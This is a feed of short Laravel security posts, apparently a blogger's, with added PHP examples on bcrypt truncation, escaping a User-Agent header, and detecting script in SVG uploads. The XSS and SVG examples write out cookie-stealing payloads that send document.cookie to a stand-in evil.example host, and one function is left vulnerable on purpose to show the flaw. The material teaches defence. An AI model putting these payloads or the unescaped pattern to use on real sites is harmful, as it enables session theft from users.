Channel: Stephen Rees-Carter :laravel:
Browsing latest articles
Browse All 424 View Live

I'll be diving into this in my next Security Tip over at https://securinglaravel.com; sign up so you don't miss it. This is a *really* fun one. 😈

Had a wide range of responses to my code question (https://phpc.social/@valorin/113999349390860081), and unsurprisingly a lot of folks aren't fully aware of how PHP handles precedence, and why brackets...

I've had a few "ad companies" reach out about ads/sponsorships on Securing Laravel, so let me be clear: I'm not interested in a third party managing any content on SL. But it got me thinking, are there...

The more dependencies your project has, the higher your risk of supply-chain attack is, and the less you're aware of what code is actually running. My recommendation: Replace simple dependencies with...

Delivering XSS payloads via User Agent strings. 😈

These are my top 3 tips for getting started with a Content Security Policy - as proven by a friend who went from failing security scans to passing with flying...

Running my first "Let's Hack!" Laravel workshop for an awesome Aussie team tomorrow! 🎉 It's based around "Th1nk Lik3 a H4cker", but I've added more challenges and twists, so even if they've studied,...

I probably won't be online much this week, we were supposed to be travelling for a family funeral, but instead we're preparing the house for incoming Cyclone Alfred! 😧 It's not on a direct course, but...

It's been a week, so a quick update: We managed to avoid any damage or loss of power/internet during the cyclone, but the prep work and kids at home meant I didn't get any work time, so I missed last...

Laravel 12 gives us the ability to reject passwords longer than 72 bytes for bcrypt, but you need to turn it on manually. Oh, and don't forget to add a validation rule, or you'll be throwing suspicious...

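Added example, not code from the post and not Laravel's own hasher or validation rule: plain PHP using password_hash/password_verify plus a hand-written byte-length check (the function name assertBcryptSafeLength and the sample passwords are assumptions made up for the demo). It shows the two things the post is about: bcrypt only ever sees the first 72 bytes of a password, so two passwords that differ only after byte 72 verify against the same hash, and a length check that is meant to protect the hasher has to count bytes, not characters.

```php
<?php
declare(strict_types=1);

// Added example (plain PHP, not Laravel's hasher or config): bcrypt silently
// uses only the first 72 bytes of a password, so check the byte length, not
// the character length, before hashing. All sample passwords are constructed.

const BCRYPT_MAX_BYTES = 72;

/** Hypothetical check: reject anything bcrypt would silently truncate. */
function assertBcryptSafeLength(string $password): void
{
    // strlen() counts bytes; mb_strlen() counts characters, which is the wrong
    // unit here: 72 multibyte characters can be far more than 72 bytes.
    if (strlen($password) > BCRYPT_MAX_BYTES) {
        throw new InvalidArgumentException(sprintf(
            'Password is %d bytes; bcrypt only uses the first %d.',
            strlen($password),
            BCRYPT_MAX_BYTES
        ));
    }
}

// 1. The truncation itself: two passwords that differ only after byte 72
//    verify against the same hash, because the tail never reached bcrypt.
$prefix   = str_repeat('a', BCRYPT_MAX_BYTES);
$realPass = $prefix . '-correct-secret';
$attacker = $prefix . '-anything-else';

$hash = password_hash($realPass, PASSWORD_BCRYPT, ['cost' => 4]); // low cost for a demo only

var_dump(password_verify($realPass, $hash));
var_dump(password_verify($attacker, $hash));

// 2. Why a character-count rule is not enough: 30 emoji is 30 characters,
//    but each one is 4 bytes in UTF-8.
$emoji = str_repeat("\u{1F512}", 30);
printf("chars=%d bytes=%d\n", mb_strlen($emoji), strlen($emoji));

try {
    assertBcryptSafeLength($emoji);
} catch (InvalidArgumentException $e) {
    echo $e->getMessage(), PHP_EOL;
}
```

Run it with the php CLI. Both password_verify calls succeed, which is the whole problem: anything past byte 72 is not part of the credential. The emoji string is 30 characters but 120 bytes; a character-based validation rule (Laravel's max:N rule counts characters for strings) passes it, and the hasher is then the first thing to complain, which is why the post says to pair the hasher option with a rule that rejects over-long input up front.
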
Ok folks, repeat after me: Do not turn on debug mode in production! Do not turn on debug mode in production! Do not turn on debug mode in production! Do not turn on debug mode in production! Do not turn on...

Ok, fine. This is actually XSS and not specifically related to debug mode. 🤷 Therefore... Repeat after me: Escape your outputs! Escape your outputs! Escape your outputs! Escape your outputs!

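Added example for the "XSS via User Agent strings" post above and the "Escape your outputs!" post here; it is not code from either post and not Blade or Laravel code. Plain PHP: the vulnerable way of reflecting a request header into HTML next to the escaped way. The User-Agent value is constructed to stand in for what an attacker sends, and renderUnsafe, renderSafe and the e() helper are names made up for the demo (e() uses the same htmlspecialchars flags Laravel's e() helper does).

```php
<?php
declare(strict_types=1);

// Added example (plain PHP, not Laravel/Blade): a request header is user input.
// Anywhere it is rendered later (analytics page, log viewer, admin dashboard)
// it must be escaped for the context it lands in. The UA value is constructed.

$userAgent = '<script>document.location="https://evil.example/?c="+document.cookie</script>';

/** Vulnerable (hypothetical): the header lands in the page as live markup. */
function renderUnsafe(string $ua): string
{
    return "<p>Your browser: {$ua}</p>";
}

/** Escape for an HTML text context. */
function e(string $value): string
{
    // ENT_QUOTES escapes both quote styles so the value is also safe inside
    // a quoted attribute; ENT_SUBSTITUTE replaces invalid UTF-8 instead of
    // returning an empty string (which would silently drop the content).
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

/** Fixed (hypothetical): the same output, escaped. */
function renderSafe(string $ua): string
{
    return '<p>Your browser: ' . e($ua) . '</p>';
}

echo renderUnsafe($userAgent), PHP_EOL;
echo renderSafe($userAgent), PHP_EOL;

// Escaping is context-specific: the same e() is enough inside an attribute
// only because the attribute value is quoted.
echo '<span title="' . e($userAgent) . '">UA</span>', PHP_EOL;
```

The first line of output is a working script tag; the second is the same bytes rendered as text. The context caveat matters: e() is an HTML-context escaper, so a value dropped into a JavaScript block, a URL or an unquoted attribute needs a different encoding, not this one.
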
Long overdue, but I finally tagged v1.0 of valorin/random! 🎉 The only significant change is removing string support in pick(), and returning the same type. The rest is pretty stable, and works from PHP...

This is gonna be a fun one! 🤓 If you have any security questions about the new Laravel Starter Kits, let me know and I'll try to fit it in!

Unexpected benefit of Laravel Cloud - spinning up test apps for vulnerability scanning. 😈

Sorry folks, I'll have to delay my In Depth on the Starter Kits until next week. I'm 4k words deep into it so far (and somehow only covered the first?! 😲) but a few things outside my control mean I...

Laravel 12 introduced a seemingly minor change: image validation now excludes SVGs by default. 🤔 Let's take a look at why this is so important!...

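Added example, not from the post and not Laravel's validator: plain PHP showing why an "image" that is really an SVG is not like a PNG. An SVG is XML, and it can carry a script element, on* event handlers and javascript: links; a browser that opens the file directly, or embeds it via object/iframe, runs that code in your origin. The SVG and PNG inputs are constructed here, and detectedMime and svgActiveContent are names made up for the demo.

```php
<?php
declare(strict_types=1);

// Added example (plain PHP, not Laravel's image rule): an SVG upload is a
// document, not a bitmap. Both inputs below are constructed for the demo.

$svg = <<<'SVG'
<?xml version="1.0"?>
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" onload="alert(document.domain)">
  <script>fetch('https://evil.example/?c=' + document.cookie)</script>
  <a xlink:href="javascript:alert(1)"><text y="20">click</text></a>
</svg>
SVG;

// A 1x1 transparent PNG: raster bytes, nothing a browser can execute.
$png = base64_decode('iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVR42mNkYPhfDwAChwGA60e6kgAAAABJRU5ErkJggg==');

/** Content sniffing: what the bytes are, regardless of the filename. */
function detectedMime(string $bytes): string
{
    return (new finfo(FILEINFO_MIME_TYPE))->buffer($bytes) ?: 'unknown';
}

/** Lists the constructs that turn an SVG into executable content. */
function svgActiveContent(string $bytes): array
{
    libxml_use_internal_errors(true);
    $doc = new DOMDocument();
    // LIBXML_NONET: no network access while parsing. External entities stay
    // disabled (the default), so this is not an XXE sink.
    if (!$doc->loadXML($bytes, LIBXML_NONET)) {
        return ['not well-formed XML (reject it anyway)'];
    }

    $findings = [];
    foreach ((new DOMXPath($doc))->query('//*') as $el) {
        /** @var DOMElement $el */
        $tag = strtolower($el->localName);
        if (in_array($tag, ['script', 'foreignobject'], true)) {
            $findings[] = "<{$el->localName}> element";
        }
        foreach ($el->attributes as $attr) {
            /** @var DOMAttr $attr */
            $name = strtolower($attr->localName); // xlink:href -> href
            if (str_starts_with($name, 'on')) {
                $findings[] = "{$name} handler on <{$el->localName}>";
            } elseif ($name === 'href' && preg_match('/^\s*javascript:/i', $attr->value)) {
                $findings[] = "javascript: URL on <{$el->localName}>";
            }
        }
    }
    return $findings;
}

foreach (['svg' => $svg, 'png' => $png] as $label => $bytes) {
    printf("%s: mime=%s\n", $label, detectedMime($bytes));
}
print_r(svgActiveContent($svg));
```

Running this reports image/svg+xml for the first input and image/png for the second, and lists the onload handler, the script element and the javascript: link in the SVG. The point is not to ship this as a sanitiser (an allow-list sanitiser is a much bigger job); it is to show that "is it an image?" and "is it safe to serve from my origin?" are different questions for SVG, which is why Laravel 12 makes the image rule reject SVG unless you opt in with image:allow_svg.
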
I don't normally post JS stuff, but CVE-2025-29927 is a whole lot of fun! "it was possible to skip running Middleware, which could allow requests to skip critical checks—such as authorization cookie...

Temporary URLs for file access are an essential piece of the security puzzle, which up until "recently" were only available out-of-the-box for the S3 driver in Laravel. Now you can easily generate them...

Proud pentester moment: One of my clients just hit me with a @ThinkstCanary Canary Token! 🤩🐷🔑
